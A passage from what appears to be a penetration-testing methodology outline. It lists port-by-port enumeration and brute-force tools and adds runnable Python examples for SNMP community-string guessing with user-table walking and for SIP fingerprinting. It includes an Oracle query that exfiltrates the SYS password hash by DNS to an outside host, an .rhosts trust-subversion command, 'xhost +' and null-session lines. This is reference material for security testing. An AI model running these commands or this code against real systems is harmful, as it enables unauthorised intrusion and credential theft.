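    for (ip, status), n in sorted(ip_status_counts(recs).items()):
        print(ip, status, n)
    print(triage(recs))
```

For a real log, replace `SAMPLE_LOG.splitlines()` with the open file; IIS writes a new `#Fields:` line whenever the logging configuration changes, and the parser follows it.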

8.9.8. References

8.9.8.1. White Papers

8.9.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness

8.9.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity

8.9.8.1.3. Blind Security Testing - An Evolutionary Approach

8.9.8.1.4. Command Injection in XML Signatures and Encryption

8.9.8.1.5. Input Validation Cheat Sheet

8.9.8.1.6. SQL Injection Cheat Sheet

8.9.8.2. Books

8.9.8.2.1. Hacking Exposed Web 2.0

8.9.8.2.2. Hacking Exposed Web Applications

8.9.8.2.3. The Web Application Hacker's Handbook

8.9.9. Exploit Frameworks

8.9.9.1. Brute-force Tools

8.9.9.1.1. Acunetix

8.9.9.2. Metasploit

8.9.9.3. w3af

8.10. Portmapper port 111 open

8.10.1. rpcdump.py

8.10.1.1. rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)

8.10.2. rpcinfo

8.10.2.1. rpcinfo [options] IP_Address

8.11. NTP Port 123 open

8.11.1. NTP Enumeration

8.11.1.1. ntpdc -c monlist IP_ADDRESS (lists up to the last 600 clients that talked to the server; removed from ntpd 4.2.7p26 onward and commonly disabled because it is the NTP amplification vector)

8.11.1.2. ntpdc -c sysinfo IP_ADDRESS

8.11.1.3. ntpq

8.11.1.3.1. host

8.11.1.3.2. hostname

8.11.1.3.3. ntpversion

8.11.1.3.4. readlist

8.11.1.3.5. version

8.11.2. Examine configuration files

8.11.2.1. ntp.conf

8.11.3. nmap nse script

8.11.3.1. ntp-info

8.12. NetBIOS Ports 135-139,445 open

8.12.1. NetBIOS enumeration

8.12.1.1. Enum

8.12.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>

8.12.1.2. Null Session

8.12.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""

8.12.1.3. Smbclient

8.12.1.3.1. smbclient -L //server -N (list shares anonymously); smbclient //server/share -U username%password (connect to a share)

8.12.1.4. Superscan

8.12.1.4.1. Enumeration tab.

8.12.1.5. user2sid/sid2user

8.12.1.6. Winfo

8.12.2. NetBIOS brute force

8.12.2.1. Hydra

8.12.2.2. Brutus

8.12.2.3. Cain & Abel

8.12.2.4. getacct

8.12.2.5. NAT (NetBIOS Auditing Tool)

8.12.3. Examine Configuration Files

8.12.3.1. Smb.conf

8.12.3.2. lmhosts

8.13. SNMP port 161 open

8.13.1. Default Community Strings

8.13.1.1. public

8.13.1.2. private

8.13.1.3. cisco

8.13.1.3.1. cable-docsis

8.13.1.3.2. ILMI

8.13.2. MIB enumeration

8.13.2.1. Windows NT

8.13.2.1.1. .1.3.6.1.2.1.1.5 Hostnames

8.13.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name

8.13.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames

8.13.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services

8.13.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information

8.13.2.2. Solarwinds MIB walk

8.13.2.3. Getif

8.13.2.4. snmpwalk

8.13.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>

8.13.2.5. Snscan

8.13.2.6. Applications

8.13.2.6.1. ZyXel

8.13.2.7. nmap nse script

8.13.2.7.1. snmp-sysdescr

8.13.3. SNMP Bruteforce

8.13.3.1. onesixtyone

8.13.3.1.1. onesixtyone -c SNMP.wordlist <IP>

8.13.3.2. cat

8.13.3.2.1. ./cat -h <IP> -w SNMP.wordlist

8.13.3.3. Solarwinds SNMP Brute Force

8.13.3.4. ADMsnmp

8.13.3.5. nmap nse script

8.13.3.5.1. snmp-brute

8.13.4. Examine SNMP Configuration files

8.13.4.1. snmp.conf

8.13.4.2. snmpd.conf

8.13.4.3. snmp-config.xml
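What onesixtyone and snmpwalk do on the wire, as an added example that is not part of the Penetration Testing Framework: SNMPv1 messages are BER-encoded by hand (no pysnmp needed), a community string is found by the fact that agents silently drop requests with a wrong one, and the Windows NT user table listed above (.1.3.6.1.4.1.77.1.2.25) is walked with GETNEXT. `udp_sender` talks to a real agent; `FakeAgent` and `SAMPLE_MIB` are constructed so the example runs offline (the LanMgr user rows are indexed by string length followed by the character codes, as the real MIB does).

```python
import socket

INTEGER, OCTET_STRING, NULL, OID, SEQUENCE = 0x02, 0x04, 0x05, 0x06, 0x30
GET_REQUEST, GET_NEXT_REQUEST, GET_RESPONSE = 0xA0, 0xA1, 0xA2
SYS_NAME = ".1.3.6.1.2.1.1.5.0"
SAMPLE_MIB = {                                   # constructed: sysName plus two LanMgr-MIB svUserName rows
    ".1.3.6.1.2.1.1.5.0": "DC01",
    ".1.3.6.1.4.1.77.1.2.25.1.1.5.71.117.101.115.116": "Guest",
    ".1.3.6.1.4.1.77.1.2.25.1.1.13.65.100.109.105.110.105.115.116.114.97.116.111.114": "Administrator",
}


def tlv(tag, payload):
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")        # long-form length
    return bytes([tag, 0x80 | len(body)]) + body + payload


def encode_int(value):
    return tlv(INTEGER, value.to_bytes((value.bit_length() + 8) // 8, "big", signed=True))


def _arcs(dotted):
    return [int(a) for a in dotted.strip(".").split(".")]


def encode_oid(dotted):
    arcs = _arcs(dotted)
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        while arc > 0x7F:                                      # base-128, high bit set on all but the last byte
            arc >>= 7
            chunk.append(0x80 | (arc & 0x7F))
        out += bytes(reversed(chunk))
    return tlv(OID, bytes(out))


def decode_oid(body):
    arcs, value = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return "." + ".".join(map(str, arcs))


def build_message(pdu_tag, community, oid, request_id=1, value=None, error=0):
    """SNMPv1 message with one varbind; value=None gives the NULL placeholder that requests carry."""
    val = (tlv(NULL, b"") if value is None else
           tlv(OCTET_STRING, value.encode()) if isinstance(value, str) else encode_int(value))
    varbind = tlv(SEQUENCE, encode_oid(oid) + val)
    pdu = tlv(pdu_tag, encode_int(request_id) + encode_int(error) + encode_int(0) + tlv(SEQUENCE, varbind))
    return tlv(SEQUENCE, encode_int(0) + tlv(OCTET_STRING, community.encode()) + pdu)


def _read_tlv(buf, pos):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def split_message(packet):
    """Unwrap an SNMPv1 message: (community, pdu_tag, request_id, error_status, [(oid, value), ...])."""
    _, msg, _ = _read_tlv(packet, 0)
    _, _, pos = _read_tlv(msg, 0)                               # version (0 = SNMPv1)
    _, community, pos = _read_tlv(msg, pos)
    pdu_tag, pdu, _ = _read_tlv(msg, pos)
    _, rid, pos = _read_tlv(pdu, 0)
    _, err, pos = _read_tlv(pdu, pos)
    _, _, pos = _read_tlv(pdu, pos)                             # error-index
    _, vbl, _ = _read_tlv(pdu, pos)
    varbinds, pos = [], 0
    while pos < len(vbl):
        _, vb, pos = _read_tlv(vbl, pos)
        _, oid_body, p = _read_tlv(vb, 0)
        vtag, vbody, _ = _read_tlv(vb, p)
        value = (int.from_bytes(vbody, "big", signed=True) if vtag == INTEGER else
                 vbody.decode("latin-1") if vtag == OCTET_STRING else None)
        varbinds.append((decode_oid(oid_body), value))
    return (community.decode("latin-1"), pdu_tag, int.from_bytes(rid, "big", signed=True),
            int.from_bytes(err, "big", signed=True), varbinds)


def find_community(send, candidates, oid=SYS_NAME):
    """onesixtyone's trick: agents ignore requests with a bad community string, so any reply at all is a hit."""
    for community in candidates:
        if send(build_message(GET_REQUEST, community, oid)):
            return community
    return None


def walk(send, community, base_oid):
    """GETNEXT-walk a subtree like snmpwalk; stops on error (v1 noSuchName at end of MIB) or on leaving the subtree."""
    base, oid, results, rid = _arcs(base_oid), base_oid, [], 1
    while True:
        reply = send(build_message(GET_NEXT_REQUEST, community, oid, rid))
        if not reply:
            break
        _, _, _, err, varbinds = split_message(reply)
        if err or not varbinds or _arcs(varbinds[0][0])[:len(base)] != base:
            break
        oid, value = varbinds[0]
        results.append((oid, value))
        rid += 1
    return results


def udp_sender(host, port=161, timeout=2.0):
    """Transport for a real target: one datagram out, the reply back, or b'' on timeout."""
    def send(request):
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.settimeout(timeout)
            s.sendto(request, (host, port))
            try:
                return s.recv(65535)
            except socket.timeout:
                return b""
    return send


class FakeAgent:
    """Constructed in-memory SNMPv1 agent so the example runs offline; not a real device."""
    def __init__(self, community, mib):
        self.community = community
        self.mib = sorted(mib.items(), key=lambda kv: _arcs(kv[0]))

    def __call__(self, request):
        community, pdu_tag, rid, _, varbinds = split_message(request)
        if community != self.community:
            return b""                                          # silently dropped, as real agents do
        asked = _arcs(varbinds[0][0])
        for oid, value in self.mib:
            if (_arcs(oid) > asked) if pdu_tag == GET_NEXT_REQUEST else (_arcs(oid) == asked):
                return build_message(GET_RESPONSE, self.community, oid, rid, value)
        return build_message(GET_RESPONSE, self.community, varbinds[0][0], rid, error=2)   # noSuchName
```

Against a real host: `send = udp_sender("192.168.1.1")`, then `find_community(send, open("SNMP.wordlist").read().split())` and `walk(send, community, ".1.3.6.1.4.1.77.1.2.25")`. Values the decoder does not recognise (Counter, TimeTicks, IpAddress) come back as None; extend `split_message` if you need them.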

8.14. LDAP Port 389 Open

8.14.1. ldap enumeration

8.14.1.1. ldapminer

8.14.1.1.1. ldapminer -h ip_address -p port (not required if default) -d

8.14.1.2. luma

8.14.1.2.1. Gui based tool

8.14.1.3. ldp

8.14.1.3.1. Gui based tool

8.14.1.4. openldap

8.14.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]

8.14.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

8.14.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]

8.14.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

8.14.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

8.14.2. ldap brute force

8.14.2.1. bf_ldap

8.14.2.1.1. bf_ldap -s server -d domain_name -u username | -U users_list_file -l password_length | -L passwords_list
optional: -p port (default 389), -v (verbose mode), -P LDAP user path (default ,CN=Users,)

8.14.2.2. K0ldS

8.14.2.3. LDAP_Brute.pl

8.14.3. Examine Configuration Files

8.14.3.1. General

8.14.3.1.1. containers.ldif

8.14.3.1.2. ldap.cfg

8.14.3.1.3. ldap.conf

8.14.3.1.4. ldap.xml

8.14.3.1.5. ldap-config.xml

8.14.3.1.6. ldap-realm.xml

8.14.3.1.7. slapd.conf

8.14.3.2. IBM SecureWay V3 server

8.14.3.2.1. V3.sas.oc

8.14.3.3. Microsoft Active Directory server

8.14.3.3.1. msadClassesAttrs.ldif

8.14.3.4. Netscape Directory Server 4

8.14.3.4.1. nsslapd.sas_at.conf

8.14.3.4.2. nsslapd.sas_oc.conf

8.14.3.5. OpenLDAP directory server

8.14.3.5.1. slapd.sas_at.conf

8.14.3.5.2. slapd.sas_oc.conf

8.14.3.6. Sun ONE Directory Server 5.1

8.14.3.6.1. 75sas.ldif

8.15. VPN ports open: IKE/IPsec UDP 500, PPTP TCP 1723, L2TP UDP 1701 (ike-scan, ike-probe and ike-crack target IKE on UDP 500)

8.15.1. Enumeration

8.15.1.1. ike-scan

8.15.1.2. ike-probe

8.15.2. Brute-Force

8.15.2.1. ike-crack

8.15.3. Reference Material

8.15.3.1. PSK cracking paper

8.15.3.2. SecurityFocus Infocus

8.15.3.3. Scanning a VPN Implementation

8.16. Modbus port 502 open

8.16.1. modscan

8.17. rlogin port 513 open

8.17.1. Rlogin Enumeration

8.17.1.1. Find the files

8.17.1.1.1. find / -name .rhosts

8.17.1.1.2. locate .rhosts

8.17.1.2. Examine Files

8.17.1.2.1. cat .rhosts

8.17.1.3. Manual Login

8.17.1.3.1. rlogin hostname -l username

8.17.1.3.2. rlogin <IP>

8.17.1.4. Subvert the files

8.17.1.4.1. echo ++ > .rhosts (trusts every host and every user; rlogin as that account then succeeds without a password)

8.17.2. Rlogin Brute force

8.17.2.1. Hydra

8.18. rsh port 514 open

8.18.1. Rsh Enumeration

8.18.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

8.18.2. Rsh Brute Force

8.18.2.1. rsh-grind

8.18.2.2. Hydra

8.18.2.3. medusa

8.19. SQL Server port 1433 (TCP) and 1434 (UDP, SQL Server Browser service) open

8.19.1. SQL Enumeration

8.19.1.1. piggy

8.19.1.2. SQLPing

8.19.1.2.1. sqlping ip_address/hostname

8.19.1.3. SQLPing2

8.19.1.4. SQLPing3

8.19.1.5. SQLpoke

8.19.1.6. SQL Recon

8.19.1.7. SQLver

8.19.2. SQL Brute Force

8.19.2.1. SQLPAT

8.19.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack

8.19.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack

8.19.2.2. SQL Dict

8.19.2.3. SQLAT

8.19.2.4. Hydra

8.19.2.5. SQLlhf

8.19.2.6. ForceSQL

8.20. Citrix port 1494 open

8.20.1. Citrix Enumeration

8.20.1.1. Default Domain

8.20.1.2. Published Applications

8.20.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]

8.20.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]

8.20.2. Citrix Brute Force

8.20.2.1. bforce.js

8.20.2.2. connect.js

8.20.2.3. Citrix Brute-forcer

8.20.2.4. Reference Material

8.20.2.4.1. Hacking Citrix - the legitimate backdoor

8.20.2.4.2. Hacking Citrix - the forceful way

8.21. Oracle Port 1521 Open

8.21.1. Oracle Enumeration

8.21.1.1. oracsec

8.21.1.2. Repscan

8.21.1.3. Sidguess

8.21.1.4. Scuba

8.21.1.5. DNS/HTTP Enumeration

8.21.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;
(forces the database to resolve a hostname built from the SYS password hash, leaking it via DNS to a resolver the tester controls; on 11g and later DBA_USERS.PASSWORD is empty and the hashes are in SYS.USER$)


8.21.1.6. WinSID

8.21.1.7. Oracle default password list

8.21.1.8. TNSVer

8.21.1.8.1. tnsver host [port]

8.21.1.9. TCP Scan

8.21.1.10. Oracle TNSLSNR

8.21.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]. Listeners before 10g accept these remotely without authentication unless a listener password has been set; 10g and later default to local OS authentication.

8.21.1.11. TNSCmd

8.21.1.11.1. perl tnscmd.pl -h ip_address

8.21.1.11.2. perl tnscmd.pl version -h ip_address

8.21.1.11.3. perl tnscmd.pl status -h ip_address

8.21.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)

8.21.1.12. LSNrCheck

8.21.1.13. Oracle Security Check (needs credentials)

8.21.1.14. OAT

8.21.1.14.1. sh opwg.sh -s ip_address

8.21.1.14.2. opwg.bat -s ip_address

8.21.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID
or (Windows) c:\oquery -s ip_address -u username -p password -d SID

8.21.1.15. OScanner

8.21.1.15.1. sh oscanner.sh -s ip_address

8.21.1.15.2. oscanner.exe -s ip_address

8.21.1.15.3. sh reportviewer.sh oscanner_saved_file.xml

8.21.1.15.4. reportviewer.exe oscanner_saved_file.xml

8.21.1.16. NGS Squirrel for Oracle

8.21.1.17. Service Register

8.21.1.17.1. Service-register.exe ip_address

8.21.1.18. PLSQL Scanner 2008

8.21.2. Oracle Brute Force

8.21.2.1. OAK

8.21.2.1.1. ora-getsid hostname port sid_dictionary_list

8.21.2.1.2. ora-auth-alter-session host port sid username password sql

8.21.2.1.3. ora-brutesid host port start

8.21.2.1.4. ora-pwdbrute host port sid username password-file

8.21.2.1.5. ora-userenum host port sid userlistfile

8.21.2.1.6. ora-ver -e (-f -l -a) host port

8.21.2.2. breakable (Targets Application Server Port)

8.21.2.2.1. breakable.exe host url [port] [v]
host: IP address of the Oracle Portal Server
url: PATH_INFO, i.e. /pls/orasso
port: TCP port the Oracle Portal Server is serving pages from
v: verbose

8.21.2.3. SQLInjector (Targets Application Server Port)

8.21.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL

8.21.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle

8.21.2.4. Check Password

8.21.2.5. orabf

8.21.2.5.1. orabf [hash]:[username] [options]

8.21.2.6. thc-orakel

8.21.2.6.1. Cracker

8.21.2.6.2. Client

8.21.2.6.3. Crypto

8.21.2.7. DBVisualisor

8.21.2.7.1. Sql scripts from pentest.co.uk

8.21.2.7.2. Manual sql input of previously reported vulnerabilties

8.21.3. Oracle Reference Material

8.21.3.1. Understanding SQL Injection

8.21.3.2. SQL Injection walkthrough

8.21.3.3. SQL Injection by example

8.21.3.4. Advanced SQL Injection in Oracle databases

8.21.3.5. Blind SQL Injection

8.21.3.6. SQL Cheatsheets


8.22. NFS Port 2049 open

8.22.1. NFS Enumeration

8.22.1.1. showmount -e hostname/ip_address

8.22.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point

8.22.2. NFS Brute Force

8.22.2.1. Interact with NFS share and try to add/delete

8.22.2.2. Exploit and Confuse Unix

8.22.3. Examine Configuration Files

8.22.3.1. /etc/exports

8.22.3.2. /var/lib/nfs/xtab (Linux; /etc/dfs/sharetab on Solaris)

8.22.4. nmap nse script

8.22.4.1. nfs-showmount

8.23. Compaq/HP Insight Manager Port 2301, 2381 open

8.23.1. HP Enumeration

8.23.1.1. Authentication Method

8.23.1.1.1. Host OS Authentication

8.23.1.1.2. Default Authentication

8.23.1.2. Wikto

8.23.1.3. Nstealth

8.23.2. HP Bruteforce

8.23.2.1. Hydra

8.23.2.2. Acunetix

8.23.3. Examine Configuration Files

8.23.3.1. path.properties

8.23.3.2. mx.log

8.23.3.3. CLIClientConfig.cfg

8.23.3.4. database.props

8.23.3.5. pg_hba.conf

8.23.3.6. jboss-service.xml

8.23.3.7. .namazurc

8.24. MySQL port 3306 open

8.24.1. Enumeration

8.24.1.1. nmap -A -n -p3306 <IP Address>

8.24.1.2. nmap -A -n -Pn --script=all -p3306 <IP Address>

8.24.1.3. telnet IP_Address 3306

8.24.1.4. use test; select * from test;

8.24.1.5. To check for other DB's -- show databases

8.24.2. Administration

8.24.2.1. MySQL Network Scanner

8.24.2.2. MySQL GUI Tools

8.24.2.3. mysqlshow

8.24.2.4. mysqlbinlog

8.24.3. Manual Checks

8.24.3.1. Default usernames and passwords

8.24.3.1.1. username: root, password: (blank)

8.24.3.1.2. testing

8.24.3.2. Configuration Files

8.24.3.2.1. Operating System

8.24.3.2.2. Command History

8.24.3.2.3. Log Files

8.24.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql

8.24.3.2.5. MySQL data directory (Location specified in my.cnf)

8.24.3.2.6. SSL Check

8.24.3.3. Privilege Escalation

8.24.3.3.1. Current Level of access

8.24.3.3.2. Access passwords

8.24.3.3.3. Create a new user and grant him privileges

8.24.3.3.4. Break into a shell

8.24.4. SQL injection

8.24.4.1. mysql-miner.pl

8.24.4.1.1. mysql-miner.pl http://target/ expected_string database

8.24.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html

8.24.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

8.24.5. References.

8.24.5.1. Design Weaknesses

8.24.5.1.1. MySQL running as root

8.24.5.1.2. Exposed publicly on Internet

8.24.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql

8.24.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0

8.25. RDesktop port 3389 open

8.25.1. Rdesktop Enumeration

8.25.1.1. Remote Desktop Connection

8.25.2. Rdesktop Bruteforce

8.25.2.1. TSGrinder

8.25.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address

8.25.2.2. Tscrack

8.26. Sybase Port 5000+ open

8.26.1. Sybase Enumeration

8.26.1.1. sybase-version ip_address from NGS

8.26.2. Sybase Vulnerability Assessment

8.26.2.1. Use DBVisualiser

8.26.2.1.1. Sybase Security checksheet

8.26.2.1.2. Manual sql input of previously reported vulnerabilties

8.26.2.2. NGS Squirrel for Sybase

8.27. SIP Port 5060 open

8.27.1. SIP Enumeration

8.27.1.1. netcat

8.27.1.1.1. nc IP_Address Port

8.27.1.2. sipflanker

8.27.1.2.1. python sipflanker.py 192.168.1-254

8.27.1.3. Sipscan

8.27.1.4. smap

8.27.1.4.1. smap IP_Address/Subnet_Mask

8.27.1.4.2. smap -o IP_Address/Subnet_Mask

8.27.1.4.3. smap -l IP_Address

8.27.2. SIP Packet Crafting etc.

8.27.2.1. sipsak

8.27.2.1.1. Tracing paths: sipsak -T -s sip:username@domain

8.27.2.1.2. OPTIONS request: sipsak -vv -s sip:username@domain

8.27.2.1.3. Query registered bindings: sipsak -I -C empty -a password -s sip:username@domain

8.27.2.2. siprogue
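The OPTIONS probe that smap (section 3.2 and 8.27.1) and `sipsak -vv` send, as an added example that is not part of the Penetration Testing Framework: build the request, parse the reply (header names normalised, RFC 3261 compact forms such as `i:` for Call-ID expanded), match it to our own Call-ID and CSeq so stray traffic is ignored, and pull out what fingerprints the stack: Server/User-Agent, Allow and Supported. `probe` sends over UDP to a real host; `sample_reply` is a constructed reply in the style of an Asterisk 1.4 box, not a capture, so the example runs offline. Addresses and the user 100 are assumptions.

```python
import random
import socket
import string

# RFC 3261 compact header forms, so parsing survives stacks that use them
COMPACT = {"v": "via", "f": "from", "t": "to", "i": "call-id", "m": "contact",
           "l": "content-length", "c": "content-type", "k": "supported", "s": "subject"}


def _token(n=16):
    return "".join(random.choice(string.ascii_lowercase + string.digits) for _ in range(n))


def build_options(target_host, target_port=5060, local_host="192.0.2.5", local_port=5060, user="100"):
    """SIP OPTIONS request; returns (wire bytes, call_id) so the reply can be matched."""
    call_id = f"{_token()}@{local_host}"
    lines = [
        f"OPTIONS sip:{user}@{target_host}:{target_port} SIP/2.0",
        f"Via: SIP/2.0/UDP {local_host}:{local_port};branch=z9hG4bK{_token(8)};rport",
        "Max-Forwards: 70",
        f"From: <sip:probe@{local_host}>;tag={_token(8)}",
        f"To: <sip:{user}@{target_host}>",
        f"Call-ID: {call_id}",
        "CSeq: 1 OPTIONS",
        f"Contact: <sip:probe@{local_host}:{local_port}>",
        "Accept: application/sdp",
        "Content-Length: 0",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode(), call_id


def parse_response(raw):
    """(status, reason, headers): names lower-cased, compact forms expanded, first occurrence kept."""
    head = raw.decode("latin-1").split("\r\n\r\n", 1)[0]
    status_line, *header_lines = head.split("\r\n")
    version, code, reason = status_line.split(" ", 2)
    if version != "SIP/2.0":
        raise ValueError("not a SIP response: " + status_line)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        name = name.strip().lower()
        headers.setdefault(COMPACT.get(name, name), value.strip())
    return int(code), reason, headers


def fingerprint(raw, call_id):
    """Summarise an OPTIONS reply; None if it does not belong to our transaction (wrong Call-ID or CSeq)."""
    code, reason, h = parse_response(raw)
    if h.get("call-id") != call_id or not h.get("cseq", "").endswith("OPTIONS"):
        return None
    return {
        "status": f"{code} {reason}",
        "software": h.get("server") or h.get("user-agent") or "(not disclosed)",
        "methods": [m.strip() for m in h.get("allow", "").split(",") if m.strip()],
        "extensions": [e.strip() for e in h.get("supported", "").split(",") if e.strip()],
    }


def probe(host, port=5060, timeout=2.0):
    """Send OPTIONS over UDP to a real target; None on timeout or on a reply that is not ours."""
    request, call_id = build_options(host, port)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(request, (host, port))
        try:
            return fingerprint(s.recv(65535), call_id)
        except socket.timeout:
            return None


def sample_reply(call_id):
    """Constructed reply (not a real capture) in the style of Asterisk 1.4, using two compact headers."""
    return (
        "SIP/2.0 200 OK\r\n"
        "Via: SIP/2.0/UDP 192.0.2.5:5060;branch=z9hG4bKabc123;received=192.0.2.5\r\n"
        "From: <sip:probe@192.0.2.5>;tag=deadbeef\r\n"
        "To: <sip:100@192.0.2.10>;tag=as1a2b3c4d\r\n"
        f"i: {call_id}\r\n"
        "CSeq: 1 OPTIONS\r\n"
        "Server: Asterisk PBX 1.4.21\r\n"
        "Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY\r\n"
        "k: replaces\r\n"
        "Contact: <sip:192.0.2.10>\r\n"
        "Accept: application/sdp\r\n"
        "Content-Length: 0\r\n\r\n"
    ).encode()
```

A 200 with a Server header is the easy case; proxies that answer 404 or 405 for an unknown user still leak their software in the same headers, which is why `fingerprint` does not require a 200.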

8.27.3. SIP Vulnerability Scanning/ Brute Force

8.27.3.1. tftp bruteforcer

8.27.3.1.1. Default dictionary file

8.27.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes

8.27.3.2. VoIPaudit

8.27.3.3. SiVuS

8.27.4. Examine Configuration Files

8.27.4.1. SIPDefault.cnf

8.27.4.2. asterisk.conf

8.27.4.3. sip.conf

8.27.4.4. phone.conf

8.27.4.5. sip_notify.conf

8.27.4.6. <Ethernet address>.cfg

8.27.4.7. 000000000000.cfg

8.27.4.8. phone1.cfg

8.27.4.9. sip.cfg etc. etc.

8.28. VNC port 5900+ open

8.28.1. VNC Enumeration

8.28.1.1. Scans

8.28.1.1.1. 5900 + display number for direct access; 5800 + display number for the HTTP (Java applet) interface

8.28.2. VNC Brute Force

8.28.2.1. Password Attacks

8.28.2.1.1. Remote

8.28.2.1.2. Local

8.28.3. Examine Configuration Files

8.28.3.1. .vnc

8.28.3.2. /etc/vnc/config

8.28.3.3. $HOME/.vnc/config

8.28.3.4. /etc/sysconfig/vncservers

8.28.3.5. /etc/vnc.conf

8.29. Tor Port 9001, 9030 open

8.29.1. Tor Node Checker

8.29.1.1. Ip Pages

8.29.1.2. Kewlio.net

8.29.2. nmap NSE script

8.30. Jet Direct 9100 open

8.30.1. hijetta

9. X11 port 6000+ open (display N listens on 6000+N)

9.1. X11 Enumeration

9.1.1. List open windows

9.1.2. Authentication Method

9.1.2.1. Xauth

9.1.2.2. Xhost

9.2. X11 Exploitation

9.2.1. xwd

9.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xwd (the output is XWD format whatever the extension; view it with xwud or convert it with ImageMagick)

9.2.2. Keystrokes

9.2.2.1. Received

9.2.2.2. Transmitted

9.2.3. Screenshots

9.2.4. xhost + (disables X access control so any host may connect; an X server that accepts unauthenticated connections on 6000+ usually has this set)

9.3. Examine Configuration Files

9.3.1. /etc/Xn.hosts (n = display number, e.g. /etc/X0.hosts)

9.3.2. /usr/lib/X11/xdm

9.3.3. /usr/lib/X11/xdm/xsession

9.3.4. /usr/lib/X11/xdm/xsession-remote

9.3.5. /usr/lib/X11/xdm/xsession.0

9.3.6. /usr/lib/X11/xdm/xdm-config

9.3.6.1. DisplayManager*authorize:on

10. Discovery & Probing. Enumeration serves two distinct purposes in an assessment: OS fingerprinting and identifying the remote applications being served. OS fingerprinting (TCP/IP stack fingerprinting) is the process of determining the operating system running on a remote host by analysing packets received from it. It can be done actively (e.g. nmap, xprobe2) or passively (e.g. p0f). Passive fingerprinting uses only packets already on the wire and sends nothing to the target; active fingerprinting is noisy, as it sends crafted packets to the host and classifies the reply (or its absence). Different operating systems respond differently to the same packet, partly because the RFCs leave room for choice and partly because of vendor-specific behaviour (Microsoft's stacks being the best-known case), so custom packets can tell them apart. The applications served by a host are inferred from its open ports; port scanning builds up a picture of what is running so the rest of the test can be tailored accordingly.

